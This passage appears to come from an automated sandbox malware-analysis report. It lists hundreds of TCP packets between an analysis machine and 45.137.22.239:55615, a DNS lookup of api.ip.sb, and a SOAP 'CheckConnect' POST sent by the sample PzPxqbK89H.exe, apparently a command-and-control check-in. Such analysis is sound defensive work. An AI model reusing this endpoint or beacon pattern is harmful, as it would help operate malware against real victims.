                    Aug 31, 2024 14:42:22.619178057 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619185925 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619318008 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619326115 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619334936 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619342089 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619358063 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619364977 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619379997 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619386911 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619395018 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619401932 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619416952 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619424105 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619471073 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619478941 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619491100 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619498968 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619533062 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619539976 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619559050 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619568110 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619668007 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619676113 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619679928 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619687080 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619693995 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619702101 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619718075 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619725943 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619844913 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619853020 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619929075 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619937897 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619946957 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.619991064 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620075941 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620093107 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620183945 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620192051 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620212078 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620219946 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620268106 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620275974 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620367050 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620374918 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620382071 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620388985 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620398998 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620462894 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620470047 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620476961 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620495081 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620511055 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620763063 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620770931 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620779037 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620785952 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620793104 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620795965 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620799065 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620812893 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620821953 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620829105 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620836973 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620843887 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620851994 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620861053 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620877028 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620883942 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620932102 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620940924 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620943069 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620945930 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.620994091 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621001959 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621005058 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621009111 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621018887 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621021986 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621073008 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621079922 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621094942 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621102095 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621153116 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621161938 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621220112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621227026 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621233940 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621241093 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621253967 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621262074 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621264935 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621304989 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621313095 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621315002 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621339083 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621346951 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621443033 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621449947 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621457100 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621464014 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621510983 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621519089 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621526957 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621535063 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621592999 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621601105 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621665955 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621700048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621860981 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621869087 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621871948 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621875048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621881962 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621889114 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621927023 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621933937 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621939898 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621948004 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621963978 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.621970892 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622041941 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622050047 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622054100 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622061968 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622102976 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622111082 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622134924 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622142076 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622157097 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622164011 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622217894 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622226000 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622241020 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622248888 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622289896 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622297049 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622306108 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622368097 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622381926 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622389078 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622421980 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622428894 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622436047 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622445107 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622512102 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622519016 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622553110 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622560024 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622566938 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622575045 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622589111 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622596979 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622679949 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622687101 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622694969 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622701883 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622714043 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622721910 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622761011 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622769117 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622782946 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622791052 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622800112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622807026 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622854948 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622863054 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622868061 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622875929 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622921944 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622929096 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622945070 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622951984 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.622996092 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623003960 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623018026 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623024940 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623099089 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623106956 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623114109 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623121977 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623184919 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623193026 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623195887 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623203039 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623210907 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623219967 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623267889 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623275995 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623280048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623282909 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623346090 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623353958 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623361111 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623368979 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623380899 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623388052 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623425007 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623433113 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623498917 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623507023 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623512983 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623548985 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623555899 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623563051 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623648882 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623656988 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623660088 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623667002 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623684883 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623692036 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623698950 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623713017 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623720884 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623727083 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623742104 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623749018 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623795986 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623802900 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623817921 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623825073 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623857021 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623871088 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623939991 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623949051 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623955965 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.623963118 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624027967 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624034882 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624041080 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624048948 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624056101 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624063015 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624105930 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624113083 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624120951 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624129057 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624197960 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624205112 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624211073 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624218941 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624288082 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624294996 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624301910 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624310970 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624325991 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624332905 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624402046 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624408960 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624459982 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624466896 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624524117 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624531031 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624594927 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624651909 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624725103 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624733925 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624737024 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624746084 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624752998 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624762058 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624778032 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624789000 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624795914 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624803066 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624818087 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624825954 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624869108 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624872923 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624881983 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624888897 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624946117 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624954939 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624969006 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.624979019 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625014067 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625022888 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625039101 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625045061 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625098944 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625107050 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625171900 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625211954 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625220060 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625226974 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625235081 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625237942 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625247002 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625255108 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625310898 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625319004 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625333071 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625339985 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625377893 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625385046 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625442028 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625449896 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625456095 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625468016 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625483990 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625492096 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625530005 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625538111 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625554085 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625560999 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625570059 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625617027 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625623941 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625632048 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625639915 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625646114 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625699043 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625705957 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625710011 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.625715971 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:22.668517113 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:23.632262945 CEST556154974945.137.22.239192.168.2.4
                    Aug 31, 2024 14:42:23.643843889 CEST4974855615192.168.2.445.137.22.239
                    Aug 31, 2024 14:42:23.644007921 CEST4974955615192.168.2.445.137.22.239

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Aug 31, 2024 14:42:08.780440092 CEST5847253192.168.2.41.1.1.1

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Aug 31, 2024 14:42:08.780440092 CEST192.168.2.41.1.1.10x259fStandard query (0)api.ip.sbA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Aug 31, 2024 14:42:08.791512012 CEST1.1.1.1192.168.2.40x259fNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • 45.137.22.239:55615

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.44973745.137.22.239556157792C:\Users\user\Desktop\PzPxqbK89H.exe
                    TimestampBytes transferredDirectionData
                    Aug 31, 2024 14:42:02.335882902 CEST240OUTPOST / HTTP/1.1
                    Content-Type: text/xml; charset=utf-8
                    SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                    Host: 45.137.22.239:55615
                    Content-Length: 137
                    Expect: 100-continue
                    Accept-Encoding: gzip, deflate
                    Connection: Keep-Alive
                    Aug 31, 2024 14:42:02.933919907 CEST25INHTTP/1.1 100 Continue
                    Aug 31, 2024 14:42:03.067168951 CEST359INHTTP/1.1 200 OK
                    Content-Length: 212
                    Content-Type: text/xml; charset=utf-8
                    Server: Microsoft-HTTPAPI/2.0
                    Date: Sat, 31 Aug 2024 12:42:02 GMT
